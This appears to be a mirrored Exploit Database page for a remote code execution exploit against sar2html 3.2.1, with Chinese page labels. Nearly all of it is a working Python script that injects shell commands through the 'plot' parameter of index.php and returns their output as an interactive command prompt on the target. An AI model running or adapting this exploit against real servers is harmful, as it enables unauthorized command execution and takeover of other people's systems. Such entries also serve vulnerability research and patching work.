sar2html 3.2.1 – ‘plot’ Remote Code Execution

• Exploit Database
• 16 阅读

• 作者： Musyoka Ian
  日期： 2021-01-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49344/

• # Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution
  # Date: 27-12-2020
  # Exploit Author: Musyoka Ian
  # Vendor Homepage:https://github.com/cemtan/sar2html 
  # Software Link: https://sourceforge.net/projects/sar2html/
  # Version: 3.2.1
  # Tested on: Ubuntu 18.04.1
  
  #!/usr/bin/env python3
  
  import requests
  import re
  from cmd import Cmd
  
  url = input("Enter The url => ")
  
  class Terminal(Cmd):
  prompt = "Command => "
  def default(self, args):
  exploiter(args)
  
  def exploiter(cmd):
  global url
  sess = requests.session()
  output = sess.get(f"{url}/index.php?plot=;{cmd}")
  try:
  out = re.findall("<option value=(.*?)>", output.text)
  except:
  print ("Error!!")
  for ouut in out:
  if "There is no defined host..." not in ouut:
  if "null selected" not in ouut:
  if "selected" not in ouut:
  print (ouut)
  print ()
  
  if __name__ == ("__main__"):
  terminal = Terminal()
  terminal.cmdloop()